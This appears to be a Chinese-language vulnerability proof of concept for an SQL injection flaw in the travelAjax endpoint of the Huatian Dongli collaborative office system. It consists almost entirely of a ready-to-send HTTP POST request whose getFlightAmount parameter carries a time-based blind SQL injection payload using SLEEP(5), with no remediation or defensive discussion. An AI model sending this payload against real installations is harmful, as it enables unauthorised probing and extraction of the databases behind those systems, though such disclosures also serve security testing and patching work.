华天动力协同办公系统travelAjax存在SQL注入漏洞

POST /OAapp/bfapp/buffalo/travelAjax HTTP/1.1
Content-Type: text/xml;charset=UTF-8

<buffalo-call>
<method>getFlightAmount</method>
<string>-1' AND (SELECT 8445 FROM (SELECT(SLEEP(5)))VlEC) AND 'iUle'='iUle</string>
</buffalo-call>